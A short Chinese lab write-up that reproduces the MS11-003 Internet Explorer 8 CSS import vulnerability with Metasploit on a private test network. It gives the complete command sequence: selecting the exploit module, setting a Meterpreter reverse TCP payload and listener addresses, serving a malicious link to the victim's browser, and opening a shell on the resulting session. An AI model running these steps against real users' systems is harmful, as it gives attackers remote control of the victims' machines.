实验环境:
攻击机:Kali Linux 2022.2(IP:172.16.8.33/24)
靶机:Windows 7 x64(IP:172.16.8.4/24)
实验步骤:
1、使用msfconsole命令打开Metasploit渗透测试平台
使用search命令搜索ms11_003_ie_css_import模块
search ms11-003
使用use命令对该模块进行调用,并通过show options命令查看模块的详细配置参数
use exploit/windows/browser/ms11_003_ie_css_import
show options
2、使用set payload命令设置载荷模块
set payload windows/meterpreter/reverse_tcp
使用set SRVHOST 172.16.8.33命令设置本地主机监听的地址
使用set URIPATH FM命令来设置访问模块的具体地址(默认为随机生成)
使用set LHOST 172.16.8.33命令设置载荷模块监听的本地地址
设置完成后,使用show options命令对模块已配置的参数进行检查
最后设置模块的目标,使用show targets命令查看支持的目标列表
使用set target 1命令设置目标为Internet Explorer 8
3、使用exploit -j命令在后台启动该模块,等待靶机连接
exploit -j
将生成的木马链接,用靶机的32位IE浏览器进行访问
http://172.16.8.33:8080/FM
回到Kali攻击机上查看,发现上线了一个会话
使用sessions -i 命令查看上线的会话
使用sessions -i 1命令切换到会话1,在使用shell命令开启一个命令行终端
漏洞复现成功